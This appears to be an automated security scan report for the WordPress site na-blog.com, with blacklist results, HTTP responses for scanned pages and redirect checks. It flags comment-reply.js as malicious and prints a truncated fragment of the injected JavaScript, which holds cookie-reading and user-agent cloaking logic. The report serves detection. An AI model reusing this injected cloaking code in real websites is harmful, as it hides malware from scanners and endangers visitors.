Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=na-blog.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://na-blog.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.na-blog.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 09:40:23 GMT Location: http://na-blog.com/ Server: Apache/2.2.22 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://na-blog.com/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://na-blog.com/ | 200 OK Content-Length: 74257 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=3.4 | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3799 Content-Type: text/javascript | clean |
http://www.na-blog.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 22 Dec 2014 09:40:26 GMT Pragma: no-cache Location: http://na-blog.com/test404page.js Server: Apache/2.2.22 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 22 Dec 2014 09:40:27 GMT X-Pingback: http://na-blog.com/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://na-blog.com/test404page.js | 404 Not Found Content-Length: 10329 Content-Type: text/html | clean |
http://na-blog.com/about/ | 200 OK Content-Length: 7887 Content-Type: text/html | clean |
http://na-blog.com/wp-includes/js/comment-reply.js?ver=3.4 | 200 OK Content-Length: 1756 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://na-blog.com/sample-page/ | 200 OK Content-Length: 7472 Content-Type: text/html | clean |
http://na-blog.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 22 Dec 2014 09:40:31 GMT Pragma: no-cache Location: http://na-blog.com/wp-login.php?redirect_to=http%3A%2F%2Fna-blog.com%2Fwp-admin%2F&reauth=1 Server: Apache/2.2.22 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 22 Dec 2014 09:40:32 GMT X-Powered-By: PHP/5.3.29 | clean |
http://na-blog.com/wp-login.php?redirect_to=http%3a%2f%2fna-blog.com%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2088 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: na-blog.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 09:40:24 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://na-blog.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: na-blog.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 09:40:24 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://na-blog.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: na-blog.com
Referer: http://www.google.com/search?q=na-blog.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: na-blog.com
Referer: http://www.google.com/search?q=na-blog.com
Result:
The result is similar to the first query. There are no suspicious redirects found.